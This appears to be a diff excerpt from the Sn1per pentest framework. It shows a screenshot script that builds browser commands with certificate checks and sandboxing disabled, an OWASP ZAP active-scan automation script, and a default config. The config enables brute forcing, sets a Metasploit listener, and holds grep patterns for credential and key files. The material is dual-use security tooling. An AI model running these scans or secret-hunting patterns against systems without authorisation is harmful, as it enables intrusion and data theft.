return re.sub('[^\w\-_\. ]', '-port', filename)
#print (filename)
def extract_all_matched_named_groups(regex, match):
"""
Return a set of all extractable matched parameters.
>>> full_uri_domain.groupindex
{'domain': 1, 'port': 3}
>>>full_uri_domain.match('http://8.8.8.8:80').group('domain')
'8.8.8.8'
>>>extract_all_matched_named_groups() => {'domain': '8.8.8.8', 'port': '80'}
"""
result = {}
for name, id in regex.groupindex.items():
matched_value = match.group(name)
if matched_value != None: result[name] = matched_value
return result
def entry_format_validator(line):
"""
Validate the current line against several regexes and return matched parameters (ip, domain, port etc.)
"""
tab = { 'full_uri_domain' : full_uri_domain,
'fqdn_only' : fqdn_only,
'fqdn_and_port' : fqdn_and_port,
'ipv4_and_port' : ipv4_and_port,
'ipv4_only' : ipv4_only,
'entry_from_csv' : entry_from_csv
}
for name, regex in tab.items():
validator = regex.match(line)
if validator:
return extract_all_matched_named_groups(regex, validator)
def parse_targets(options, arguments):
"""
Parse list and convert each target to valid URI with port(protocol://foobar:port)
"""
target_list = []
if options.input_file != None:
with open(options.input_file,'rb') as fd_input:
try:
lines = [l.decode('utf-8').lstrip().rstrip().strip() for l in fd_input.readlines()]
except UnicodeDecodeError as e:
logger_gen.error('Your input file is not UTF-8 encoded, please encode it before using this script')
sys.exit(0)
else:
lines = arguments
for index, line in enumerate(lines, start=1):
matches = entry_format_validator(line)
# pass if line can be recognized as a correct input, or if no 'host' group could be found with all the regexes
if matches == None or not('host' in matches.keys()):
logger_gen.warn("Line %s '%s' could not have been recognized as a correct input" % (index, line))
pass
else:
host = matches['host']
# Protocol is 'http' by default, unless ssl is forced
if options.ssl == True:
protocol = 'https'
elif 'protocol' in matches.keys():
protocol = str(matches['protocol'])
else:
protocol = 'http'
# Port is ('80' for http) or ('443' for https) by default, unless a specific port is supplied
if options.port != None:
port = options.port
elif 'port' in matches.keys():
port = int(matches['port'])
# if port is 443, assume protocol is https if is not specified
protocol = 'https' if port == 443 else protocol
else:
port = 443 if protocol == 'https' else 80
# No resource URI by default
if 'res' in matches.keys():
res = str(matches['res'])
else:
res = None
# perform screenshots over HTTP and HTTPS for each target
if options.multiprotocol:
final_uri_http_port = int(matches['port']) if 'port' in matches.keys() else 80
final_uri_http = '%s://%s:%s' % ('http', host, final_uri_http_port)
target_list.append(final_uri_http)
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri_http))
final_uri_https_port = int(matches['port']) if 'port' in matches.keys() else 443
final_uri_https = '%s://%s:%s' % ('https', host, final_uri_https_port)
target_list.append(final_uri_https)
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri_https))
else:
final_uri = '%s://%s:%s' % (protocol, host, port)
final_uri = final_uri + '/%s' % res if res != None else final_uri
target_list.append(final_uri)
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri))
return target_list
def craft_cmd(url_and_options):
"""
Craft the correct command with url and options
"""
global logger_output, PHANTOMJS_BIN, WEBSCREENSHOT_JS, SCREENSHOTS_DIRECTORY, SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
url, options = url_and_options
logger_url = logging.getLogger("%s" % url)
logger_url.addHandler(logger_output)
logger_url.setLevel(options.log_level)
#output_filename = os.path.join(SCREENSHOTS_DIRECTORY, ('%s.png' % filter_bad_filename_chars(url)))
output_filename = os.path.join(SCREENSHOTS_DIRECTORY, ('%s.jpg' % filter_bad_filename_chars(url)))
# PhantomJS renderer
if options.renderer == 'phantomjs':
# If you ever want to add some voodoo options to the phantomjs command to be executed, that's here right below
cmd_parameters = [ PHANTOMJS_BIN,
'--ignore-ssl-errors true',
'--ssl-protocol any',
'--ssl-ciphers ALL'
]
cmd_parameters.append("--proxy %s" % options.proxy) if options.proxy != None else None
cmd_parameters.append("--proxy-auth %s" % options.proxy_auth) if options.proxy_auth != None else None
cmd_parameters.append("--proxy-type %s" % options.proxy_type) if options.proxy_type != None else None
cmd_parameters.append('"%s" url_capture="%s" output_file="%s"' % (WEBSCREENSHOT_JS, url, output_filename))
cmd_parameters.append('header="Cookie: %s"' % options.cookie.rstrip(';')) if options.cookie != None else None
cmd_parameters.append('http_username="%s"' % options.http_username) if options.http_username != None else None
cmd_parameters.append('http_password="%s"' % options.http_password) if options.http_password != None else None
if options.header:
for header in options.header:
cmd_parameters.append('header="%s"' % header.rstrip(';'))
# Chrome and chromium renderers
else:
cmd_parameters = [ CHROME_BIN ] if options.renderer == 'chrome' else [ CHROMIUM_BIN ]
cmd_parameters += [ '--allow-running-insecure-content',
'--ignore-certificate-errors',
'--ignore-urlfetcher-cert-requests',
'--reduce-security-for-testing',
'--no-sandbox',
'--headless',
'--disable-gpu',
'--hide-scrollbars',
'--incognito',
'-screenshot="%s"' % output_filename,
'--window-size=1200,800',
'"%s"' % url
]
cmd_parameters.append('--proxy-server="%s"' % options.proxy) if options.proxy != None else None
cmd = " ".join(cmd_parameters)
logger_url.debug("Shell command to be executed\n'%s'\n" % cmd)
execution_retval = shell_exec(url, cmd, options)
return execution_retval, url
def take_screenshot(url_list, options):
"""
Launch the screenshot workers
Thanks http://noswap.com/blog/python-multiprocessing-keyboardinterrupt
"""
global SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
screenshot_number = len(url_list)
print "[+] %s URLs to be screenshot" % screenshot_number
pool = multiprocessing.Pool(processes=int(options.workers), initializer=init_worker)
taken_screenshots = [r for r in pool.imap(func=craft_cmd, iterable=itertools.izip(url_list, itertools.repeat(options)))]
screenshots_error_url = [url for retval, url in taken_screenshots if retval == SHELL_EXECUTION_ERROR]
screenshots_error = sum(retval == SHELL_EXECUTION_ERROR for retval, url in taken_screenshots)
screenshots_ok = int(screenshot_number - screenshots_error)
print "[+] %s actual URLs screenshot" % screenshots_ok
print "[+] %s error(s)" % screenshots_error
if screenshots_error != 0:
for url in screenshots_error_url:
print " %s" % url
return None
def main():
"""
Dat main
"""
global VERSION, SCREENSHOTS_DIRECTORY, LOGLEVELS
signal.signal(signal.SIGINT, kill_em_all)
print 'webscreenshot.py version %s\n' % VERSION
options, arguments = parser.parse_args()
try :
options.log_level = LOGLEVELS[options.verbosity]
logger_gen.setLevel(options.log_level)
except :
parser.error("Please specify a valid log level")
if (options.input_file == None and (len(arguments) > 1 or len(arguments) == 0)):
parser.error('Please specify a valid input file or a valid URL')
if (options.input_file != None and len(arguments) == 1):
parser.error('Please specify either an input file or an URL')
if (options.output_directory != None):
SCREENSHOTS_DIRECTORY = os.path.abspath(os.path.join(os.getcwdu(), options.output_directory))
logger_gen.debug("Options: %s\n" % options)
if not os.path.exists(SCREENSHOTS_DIRECTORY):
logger_gen.info("'%s' does not exist, will then be created" % SCREENSHOTS_DIRECTORY)
os.makedirs(SCREENSHOTS_DIRECTORY)
url_list = parse_targets(options, arguments)
take_screenshot(url_list, options)
return None
if __name__ == "__main__" :
main()

510
bin/zap-scan.py Normal file
View File

@@ -0,0 +1,510 @@
#!/usr/bin/env python3
'''
This script aims to be the most generic and the most explicit possible.
It works with OWASP ZAP API Python client.
To use it, you have to load the Python API client module and start ZAP
Before starting this script for the first time: Open ZAP, go to
Tools -> Options -> API -> Generate random Key, copy and paste the key in the
variable "apiKey" of the configuration area
This script is divided into two parts : a configuration area, where you have to
change variables according to your needs, and the part with API calls.
Author : aine-rb on Github, from Sopra Steria - modified for Sn1per by @xer0dayz
'''
import time
from pprint import pprint
from zapv2 import ZAPv2
import sys, getopt
targetURL = str(sys.argv[1])
#######################################
### BEGINNING OF CONFIGURATION AREA ###
#######################################
## The user only needs to change variable values bellow to make the script
## work according to his/her needs. MANDATORY parameters must not be empty
# MANDATORY. Define the API key generated by ZAP and used to verify actions.
apiKey=''
# MANDATORY. Define the listening address of ZAP instance
localProxy = {"http": "http://127.0.0.1:8081", "https": "http://127.0.0.1:8081"}
# MANDATORY. True to create another ZAP session (overwrite the former if the
# same name already exists), False to use an existing one
isNewSession = True
# MANDATORY. ZAP Session name
sessionName = 'WebgoatSession'
# Define the list of global exclude URL regular expressions. List can be empty.
# The expressions must follow the java.util.regex.Pattern class syntax
# The following example excludes every single URL except http://localhost:8081
globalExcludeUrl = ['^(?:(?!http:\/\/localhost:8081).*).$']
# MANDATORY. Define if an outgoing proxy server is used
useProxyChain = False
# MANDATORY only if useProxyChain is True, ignored otherwise.
# Outgoing proxy address and port
proxyAddress = 'my.corp.proxy'
proxyPort = '8080'
# Define the addresses to skip in case useProxyChain is True. Ignored
# otherwise. List can be empty.
skipProxyAddresses = ('127.0.0.1;'
'localhost')
# MANDATORY only if useProxyChain is True. Ignored otherwise.
# Define if proxy server needs authentication
useProxyChainAuth = False
# MANDATORY only if useProxyChainAuth is True. Ignored otherwise
proxyUsername = ''
proxyPassword = ''
proxyRealm = ''
# MANDATORY. Determine if a proxy script must be loaded. Proxy scripts are
# executed for every request traversing ZAP
useProxyScript = False
# MANDATORY only if useProxyScript is True. Ignored otherwise
proxyScriptName = 'proxyScript.js'
# Script engine values: "Oracle Nashorn" for Javascript,
# "jython" for python, "JSR 223 JRuby Engine" for ruby
proxyScriptEngine = 'Oracle Nashorn'
# Asolute local path
proxyScriptFileName = '/zap/scripts/proxy/proxyScript.js'
proxyScriptDescription = 'This is a description'
# MANDATORY. Determine if context must be configured then used during scans.
# You have to set this parameter to True if you want that ZAP performs scans
# from the point of view of a specific user
useContextForScan = False
# MANDATORY only if useContextForScan is True. Ignored otherwise. Set value to
# True to define a new context. Set value to False to use an existing one.
defineNewContext = False
# MANDATORY only if defineNewContext is True. Ignored otherwise
contextName = 'WebGoat_script-based'
# MANDATORY only if defineNewContext is False. Disregarded otherwise.
# Corresponds to the ID of the context to use
contextId = 0
# Define Context Include URL regular expressions. Ignored if useContextForScan
# is False. You have to put the URL you want to test in this list.
contextIncludeURL = [targetURL + '.*']
# Define Context Exclude URL regular expressions. Ignored if useContextForScan
# is False. List can be empty.
contextExcludeURL = ['http://localhost:8081/WebGoat/j_spring_security_logout',
'http://localhost:8081/WebGoat/logout.mvc']
# MANDATORY only if useContextForScan is True. Ignored otherwise. Define the
# session management method for the context. Possible values are:
# "cookieBasedSessionManagement"; "httpAuthSessionManagement"
sessionManagement = 'cookieBasedSessionManagement'
# MANDATORY only if useContextForScan is True. Ignored otherwise. Define
# authentication method for the context. Possible values are:
# "manualAuthentication"; "scriptBasedAuthentication"; "httpAuthentication";
# "formBasedAuthentication"
authMethod = 'scriptBasedAuthentication'
# MANDATORY only if authMethod is set to scriptBasedAuthentication.
# Ignored otherwise
authScriptName = 'TwoStepAuthentication.js'
# Script engine values: Oracle Nashorn for Javascript
# jython for python, JSR 223 JRuby Engine for ruby
authScriptEngine = 'Oracle Nashorn'
# Absolute local path
authScriptFileName = '/zap/scripts/authentication/TwoStepAuthentication.js'
authScriptDescription = 'This is a description'
# MANDATORY only if useContextForScan is True. Ignored otherwise. Each
# name/value pair of authParams are expected to be "x-www-form-urlencoded"
# Here is an example for scriptBasedAuthentication method:
authParams = ('scriptName=' + authScriptName + '&'
'Submission Form URL=http://localhost:8081/WebGoat/j_spring_security_check&'
'Username field=username&'
'Password field=password&'
'Target URL=http://localhost:8081/WebGoat/welcome.mvc')
## Here is an example for formBasedAuthentication method:
#authParams = ('loginUrl=http://localhost:8081/WebGoat/j_spring_security_check&'
# 'loginRequestData=username%3D%7B%25username%25%7D%26'
# 'password%3D%7B%25password%25%7D')
##Here is an example for httpAuthentication method:
#authParams = ('hostname=http://www.example.com&'
# 'realm=CORP\\administrator&'
# 'port=80')
# MANDATORY only if useContextForScan is True. Ignored otherwise.
# Set the value to True if a loggedin indicator must be used. False if it's a
# logged out indicator that must be used
isLoggedInIndicator = False
# MANDATORY only if useContextForScan is True. Ignored otherwise.
# Define either a loggedin or a loggedout indicator regular expression.
# It allows ZAP to see if the user is always authenticated during scans.
indicatorRegex = '\QLocation: http://localhost:8081/WebGoat/login.mvc\E'
# MANDATORY only if useContextForScan is True. Ignored otherwise.
# Set value to True to create new users, False otherwise
createUser = False
# MANDATORY only if createUser is True. Ignored otherwise. Define the list of
# users, with name and credentials (in x-www-form-urlencoded format)
## Here is an example with the script NashornTwoStepAuthentication.js:
userList = [
{'name': 'guest', 'credentials': 'Username=guest&Password=guest'},
{'name': 'webgoat', 'credentials': 'Username=webgoat&Password=webgoat'}
]
## Here is an example with formBasedAuthentication:
#userList = [
# {'name': 'guest', 'credentials': 'username=guest&password=guest'},
# {'name': 'webgoat', 'credentials': 'username=webgoat&password=webgoat'}
#]
# MANDATORY only if useContextForScan is True. Ignored otherwise. List can be
# empty. Define the userid list. Created users will be added to this list later
userIdList = []
# MANDATORY. Define the target site to test
#target = 'http://10.0.0.19/'
target = targetURL
# You can specify other URL in order to help ZAP discover more site locations
# List can be empty
applicationURL = ['']
# MANDATORY. Set value to True if you want to customize and use a scan policy
useScanPolicy = False
# MANDATORY only if useScanPolicy is True. Ignored otherwise. Set a policy name
scanPolicyName = 'SQL Injection and XSS'
# MANDATORY only if useScanPolicy is True. Ignored otherwise.
# Set value to True to disable all scan types except the ones set in ascanIds,
# False to enable all scan types except the ones set in ascanIds..
isWhiteListPolicy = False
# MANDATORY only if useScanPolicy is True. Ignored otherwise. Set the scan IDs
# to use with the policy. Other scan types will be disabled if
# isWhiteListPolicy is True, enabled if isWhiteListPolicy is False.
# Use zap.ascan.scanners() to list all ascan IDs.
## In the example bellow, the first line corresponds to SQL Injection scan IDs,
## the second line corresponds to some XSS scan IDs
ascanIds = [40018, 40019, 40020, 40021, 40022, 40024, 90018,
40012, 40014, 40016, 40017]
# MANDATORY only if useScanPolicy is True. Ignored otherwise. Set the alert
# Threshold and the attack strength of enabled active scans.
# Currently, possible values are:
# Low, Medium and High for alert Threshold
# Low, Medium, High and Insane for attack strength
alertThreshold = 'Medium'
attackStrength = 'Low'
# MANDATORY. Set True to use Ajax Spider, False otherwise.
useAjaxSpider = True
# MANDATORY. Set True to shutdown ZAP once finished, False otherwise
shutdownOnceFinished = False
#################################
### END OF CONFIGURATION AREA ###
#################################
sys.stdout = open("/usr/share/sniper/bin/zap-report.txt", "w")
# Connect ZAP API client to the listening address of ZAP instance
zap = ZAPv2(proxies=localProxy, apikey=apiKey)
# Start the ZAP session
core = zap.core
if isNewSession:
pprint('Create ZAP session: ' + sessionName + ' -> ' +
core.new_session(name=sessionName, overwrite=True))
else:
pprint('Load ZAP session: ' + sessionName + ' -> ' +
core.load_session(name=sessionName))
# Configure ZAP global Exclude URL option
print('Add Global Exclude URL regular expressions:')
for regex in globalExcludeUrl:
pprint(regex + ' ->' + core.exclude_from_proxy(regex=regex))
# Configure ZAP outgoing proxy server connection option
pprint('Enable outgoing proxy chain: ' + str(useProxyChain) + ' -> ' +
core.set_option_use_proxy_chain(boolean=useProxyChain))
if useProxyChain:
pprint('Set outgoing proxy name: ' + proxyAddress + ' -> ' +
core.set_option_proxy_chain_name(string=proxyAddress))
pprint('Set outgoing proxy port: ' + proxyPort + ' -> ' +
core.set_option_proxy_chain_port(integer=proxyPort))
pprint('Skip names for outgoing proxy: ' + skipProxyAddresses + ' -> ' +
core.set_option_proxy_chain_skip_name(string=skipProxyAddresses))
# Configure ZAP outgoing proxy server authentication
pprint('Set outgoing proxy chain authentication: ' +
str(useProxyChainAuth) + ' -> ' +
core.set_option_use_proxy_chain_auth(boolean=useProxyChainAuth))
if useProxyChainAuth:
pprint('Set outgoing proxy username -> ' +
core.set_option_proxy_chain_user_name(string=proxyUsername))
pprint('Set outgoing proxy password -> ' +
core.set_option_proxy_chain_password(string=proxyPassword))
pprint('Set outgoing proxy realm: ' + proxyRealm + ' -> ' +
core.set_option_proxy_chain_realm(string=proxyRealm))
if useProxyScript:
script = zap.script
script.remove(scriptname=proxyScriptName)
pprint('Load proxy script: ' + proxyScriptName + ' -> ' +
script.load(scriptname=proxyScriptName, scripttype='proxy',
scriptengine=proxyScriptEngine,
filename=proxyScriptFileName,
scriptdescription=proxyScriptDescription))
pprint('Enable proxy script: ' + proxyScriptName + ' -> ' +
script.enable(scriptname=proxyScriptName))
if useContextForScan:
# Define the ZAP context
context = zap.context
if defineNewContext:
contextId = context.new_context(contextname=contextName)
pprint('Use context ID: ' + contextId)
# Include URL in the context
print('Include URL in context:')
for url in contextIncludeURL:
pprint(url + ' -> ' +
context.include_in_context(contextname=contextName,
regex=url))
# Exclude URL in the context
print('Exclude URL from context:')
for url in contextExcludeURL:
pprint(url + ' -> ' +
context.exclude_from_context(contextname=contextName,
regex=url))
# Setup session management for the context.
# There is no methodconfigparams to provide for both current methods
pprint('Set session management method: ' + sessionManagement + ' -> ' +
zap.sessionManagement.set_session_management_method(
contextid=contextId, methodname=sessionManagement,
methodconfigparams=None))
## In case we use the scriptBasedAuthentication method, load the script
if authMethod == 'scriptBasedAuthentication':
script = zap.script
script.remove(scriptname=authScriptName)
pprint('Load script: ' + authScriptName + ' -> ' +
script.load(scriptname=authScriptName,
scripttype='authentication',
scriptengine=authScriptEngine,
filename=authScriptFileName,
scriptdescription=authScriptDescription))
# Define an authentication method with parameters for the context
auth = zap.authentication
pprint('Set authentication method: ' + authMethod + ' -> ' +
auth.set_authentication_method(contextid=contextId,
authmethodname=authMethod,
authmethodconfigparams=authParams))
# Define either a loggedin indicator or a loggedout indicator regexp
# It allows ZAP to see if the user is always authenticated during scans
if isLoggedInIndicator:
pprint('Define Loggedin indicator: ' + indicatorRegex + ' -> ' +
auth.set_logged_in_indicator(contextid=contextId,
loggedinindicatorregex=indicatorRegex))
else:
pprint('Define Loggedout indicator: ' + indicatorRegex + ' -> ' +
auth.set_logged_out_indicator(contextid=contextId,
loggedoutindicatorregex=indicatorRegex))
# Define the users
users = zap.users
if createUser:
for user in userList:
userName = user.get('name')
print('Create user ' + userName + ':')
userId = users.new_user(contextid=contextId, name=userName)
userIdList.append(userId)
pprint('User ID: ' + userId + '; username -> ' +
users.set_user_name(contextid=contextId, userid=userId,
name=userName) +
'; credentials -> ' +
users.set_authentication_credentials(contextid=contextId,
userid=userId,
authcredentialsconfigparams=user.get('credentials')) +
'; enabled -> ' +
users.set_user_enabled(contextid=contextId, userid=userId,
enabled=True))
# Enable all passive scanners (it's possible to do a more specific policy by
# setting needed scan ID: Use zap.pscan.scanners() to list all passive scanner
# IDs, then use zap.scan.enable_scanners(ids) to enable what you want
pprint('Enable all passive scanners -> ' +
zap.pscan.enable_all_scanners())
ascan = zap.ascan
# Define if a new scan policy is used
if useScanPolicy:
ascan.remove_scan_policy(scanpolicyname=scanPolicyName)
pprint('Add scan policy ' + scanPolicyName + ' -> ' +
ascan.add_scan_policy(scanpolicyname=scanPolicyName))
for policyId in range(0, 5):
# Set alert Threshold for all scans
ascan.set_policy_alert_threshold(id=policyId,
alertthreshold=alertThreshold,
scanpolicyname=scanPolicyName)
# Set attack strength for all scans
ascan.set_policy_attack_strength(id=policyId,
attackstrength=attackStrength,
scanpolicyname=scanPolicyName)
if isWhiteListPolicy:
# Disable all active scanners in order to enable only what you need
pprint('Disable all scanners -> ' +
ascan.disable_all_scanners(scanpolicyname=scanPolicyName))
# Enable some active scanners
pprint('Enable given scan IDs -> ' +
ascan.enable_scanners(ids=ascanIds,
scanpolicyname=scanPolicyName))
else:
# Enable all active scanners
pprint('Enable all scanners -> ' +
ascan.enable_all_scanners(scanpolicyname=scanPolicyName))
# Disable some active scanners
pprint('Disable given scan IDs -> ' +
ascan.disable_scanners(ids=ascanIds,
scanpolicyname=scanPolicyName))
else:
print('No custom policy used for scan')
scanPolicyName = None
# Open URL inside ZAP
pprint('Access target URL ' + target)
core.access_url(url=target, followredirects=True)
for url in applicationURL:
pprint('Access URL ' + url)
core.access_url(url=url, followredirects=True)
# Give the sites tree a chance to get updated
time.sleep(2)
# Launch Spider, Ajax Spider (if useAjaxSpider is set to true) and
# Active scans, with a context and users or not
forcedUser = zap.forcedUser
spider = zap.spider
ajax = zap.ajaxSpider
scanId = 0
print('Starting Scans on target: ' + target)
if useContextForScan:
for userId in userIdList:
print('Starting scans with User ID: ' + userId)
# Spider the target and recursively scan every site node found
scanId = spider.scan_as_user(contextid=contextId, userid=userId,
url=target, maxchildren=None, recurse=True, subtreeonly=None)
print('Start Spider scan with user ID: ' + userId +
'. Scan ID equals: ' + scanId)
# Give the spider a chance to start
time.sleep(2)
while (int(spider.status(scanId)) < 100):
print('Spider progress: ' + spider.status(scanId) + '%')
time.sleep(2)
print('Spider scan for user ID ' + userId + ' completed')
if useAjaxSpider:
# Prepare Ajax Spider scan
pprint('Set forced user mode enabled -> ' +
forcedUser.set_forced_user_mode_enabled(boolean=True))
pprint('Set user ID: ' + userId + ' for forced user mode -> ' +
forcedUser.set_forced_user(contextid=contextId,
userid=userId))
# Ajax Spider the target URL
pprint('Ajax Spider the target with user ID: ' + userId + ' -> ' +
ajax.scan(url=target, inscope=None))
# Give the Ajax spider a chance to start
time.sleep(10)
while (ajax.status != 'stopped'):
print('Ajax Spider is ' + ajax.status)
time.sleep(5)
for url in applicationURL:
# Ajax Spider every url configured
pprint('Ajax Spider the URL: ' + url + ' with user ID: ' +
userId + ' -> ' +
ajax.scan(url=url, inscope=None))
# Give the Ajax spider a chance to start
time.sleep(10)
while (ajax.status != 'stopped'):
print('Ajax Spider is ' + ajax.status)
time.sleep(5)
pprint('Set forced user mode disabled -> ' +
forcedUser.set_forced_user_mode_enabled(boolean=False))
print('Ajax Spider scan for user ID ' + userId + ' completed')
# Launch Active Scan with the configured policy on the target url
# and recursively scan every site node
scanId = ascan.scan_as_user(url=target, contextid=contextId,
userid=userId, recurse=True, scanpolicyname=scanPolicyName,
method=None, postdata=True)
print('Start Active Scan with user ID: ' + userId +
'. Scan ID equals: ' + scanId)
# Give the scanner a chance to start
time.sleep(2)
while (int(ascan.status(scanId)) < 100):
print('Active Scan progress: ' + ascan.status(scanId) + '%')
time.sleep(2)
print('Active Scan for user ID ' + userId + ' completed')
else:
# Spider the target and recursively scan every site node found
scanId = spider.scan(url=target, maxchildren=None, recurse=True,
contextname=None, subtreeonly=None)
print('Scan ID equals ' + scanId)
# Give the Spider a chance to start
time.sleep(2)
while (int(spider.status(scanId)) < 100):
print('Spider progress ' + spider.status(scanId) + '%')
time.sleep(2)
print('Spider scan completed')
if useAjaxSpider:
# Ajax Spider the target URL
pprint('Start Ajax Spider -> ' + ajax.scan(url=target, inscope=None))
# Give the Ajax spider a chance to start
time.sleep(10)
while (ajax.status != 'stopped'):
print('Ajax Spider is ' + ajax.status)
time.sleep(5)
for url in applicationURL:
# Ajax Spider every url configured
pprint('Ajax Spider the URL: ' + url + ' -> ' +
ajax.scan(url=url, inscope=None))
# Give the Ajax spider a chance to start
time.sleep(10)
while (ajax.status != 'stopped'):
print('Ajax Spider is ' + ajax.status)
time.sleep(5)
print('Ajax Spider scan completed')
# Launch Active scan with the configured policy on the target url and
# recursively scan every site node
scanId = zap.ascan.scan(url=target, recurse=True, inscopeonly=None,
scanpolicyname=scanPolicyName, method=None, postdata=True)
print('Start Active scan. Scan ID equals ' + scanId)
while (int(ascan.status(scanId)) < 100):
print('Active Scan progress: ' + ascan.status(scanId) + '%')
time.sleep(5)
print('Active Scan completed')
# Give the passive scanner a chance to finish
time.sleep(5)
# If you want to retrieve alerts:
## pprint(zap.core.alerts(baseurl=target, start=None, count=None))
print('HTML report:')
pprint(core.htmlreport())
# To retrieve ZAP report in XML or HTML format
print('XML report')
pprint(core.xmlreport())
if shutdownOnceFinished:
# Shutdown ZAP once finished
pprint('Shutdown ZAP -> ' + core.shutdown())
sys.stdout.close()

215
conf/bug_bounty_full_brute Normal file
View File

File diff suppressed because one or more lines are too long

215
conf/bug_bounty_max_javascript_files Normal file
View File

File diff suppressed because one or more lines are too long

215
conf/bug_bounty_quick Normal file
View File

File diff suppressed because one or more lines are too long

215
conf/bug_bounty_quick_port_80_443_only Normal file
View File

File diff suppressed because one or more lines are too long

219
conf/deep_active_recon Normal file
View File

File diff suppressed because one or more lines are too long

245
conf/default Normal file
View File

@@ -0,0 +1,245 @@
INSTALL_DIR="/usr/share/sniper"
SNIPER_PRO=$INSTALL_DIR/pro.sh
PLUGINS_DIR="$INSTALL_DIR/plugins"
# COLORS
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
REGEX='^[0-9]+$'
# DEFAULT SETTINGS
AUTO_BRUTE="0"
AUTO_VULNSCAN="0"
FULLNMAPSCAN="0"
OSINT="0"
ENABLE_AUTO_UPDATES="1"
REPORT="1"
LOOT="1"
# OUT OF SCOPE
OUT_OF_SCOPE=("www.sn1persecurity.com" "sn1persecurity.com" "*.sn1persecurity.com")
# SN1PER PROFESSIONAL SETTINGS
SNIPER_PRO_CONSOLE_OUTPUT="0"
SN1PER_AUTOLOAD="0"
MAX_HOSTS="2000"
# DEFAULT BROWSER
BROWSER="firefox"
# BURP 2.0 SCANNER CONFIG
BURP_HOST="127.0.0.1"
BURP_PORT="1338"
# OPENVAS CONFIG
OPENVAS="0"
OPENVAS_HOST="127.0.0.1"
OPENVAS_PORT="9390"
OPENVAS_USERNAME="admin"
OPENVAS_PASSWORD=""
OPENVAS_RUNAS_USER="kali"
# NESSUS CONFIG
NESSUS="0"
NESSUS_HOST="127.0.0.1:8834"
NESSUS_USERNAME="admin"
NESSUS_PASSWORD=""
NESSUS_POLICY_ID="c3cbcd46-329f-a9ed-1077-554f8c2af33d0d44f09d736969bf"
# METASPLOIT SCANNER CONFIG
METASPLOIT_IMPORT="0"
MSF_LHOST="127.0.0.1"
MSF_LPORT="4444"
# SHODAN API KEY
SHODAN_API_KEY=""
# CENSYS API KEYS
CENSYS_APP_ID=""
CENSYS_API_SECRET=""
# HUNTER.IO API KEY
HUNTERIO_KEY=""
# TOMBA.IO API
TOMBAIO_KEY=""
TOMBAIO_SECRET=""
# GITHUB API KEY
GITHUB_API_KEY=""
# SLACK API
SLACK_NOTIFICATIONS="0"
SLACK_NOTIFICATIONS_THEHARVESTER="0"
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
SLACK_NOTIFICATIONS_SUBNETS="0"
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
SLACK_NOTIFICATIONS_WHATWEB="0"
SLACK_NOTIFICATIONS_NMAP="0"
SLACK_NOTIFICATIONS_NMAP_DIFF="0"
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
SLACK_NOTIFICATIONS_WHOIS="0"
SLACK_NOTIFICATIONS_METAGOOFIL="0"
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
# ACTIVE WEB BRUTE FORCE STAGES
WEB_BRUTE_STEALTHSCAN="1"
WEB_BRUTE_COMMONSCAN="1"
WEB_BRUTE_FULLSCAN="0"
WEB_BRUTE_EXPLOITSCAN="0"
WEB_JAVASCRIPT_ANALYSIS="1"
MAX_JAVASCRIPT_FILES="25"
# WEB BRUTE FORCE WORDLISTS
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
WEB_BRUTE_COMMON="$INSTALL_DIR/wordlists/web-brute-common.txt"
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt"
WEB_BRUTE_EXPLOITS="$INSTALL_DIR/wordlists/web-brute-exploits.txt"
WEB_BRUTE_EXTENSIONS="htm,html,asp,aspx,php,jsp,js"
WEB_BRUTE_EXCLUDE_CODES="400,403,404,405,406,429,500,502,503,504"
# GREP PATTERNS
STATIC_GREP_SEARCH="1"
GREP_MAX_LINES="10"
GREP_INTERESTING_SUBDOMAINS="admin|jenkins|test|proxy|stage|test|dev|devops|staff|db|qa|internal"
GREP_EXTENSIONS="\.action|\.adr|\.ascx|\.asmx|\.axd|\.backup|\.bak|\.bkf|\.bkp|\.bok|\.achee|\.cfg|\.cfm|\.cgi|\.cnf|\.conf|\.config|\.crt|\.csr|\.csv|\.dat|\.doc|\.docx|\.eml|\.env|\.exe|\.gz|\.ica|\.inf|\.ini|\.java|\.json|\.key|\.log|\.lst|\.mai|\.mbox|\.mbx|\.md|\.mdb|\.nsf|\.old|\.ora|\.pac|\.passwd|\.pcf|\.pdf|\.pem|\.pgp|\.pl| plist|\.pwd|\.rdp|\.reg|\.rtf|\.skr|\.sql|\.swf|\.tpl|\.txt|\.url|\.wml|\.xls|\.xlsx|\.xml|\.xsd|\.yml"
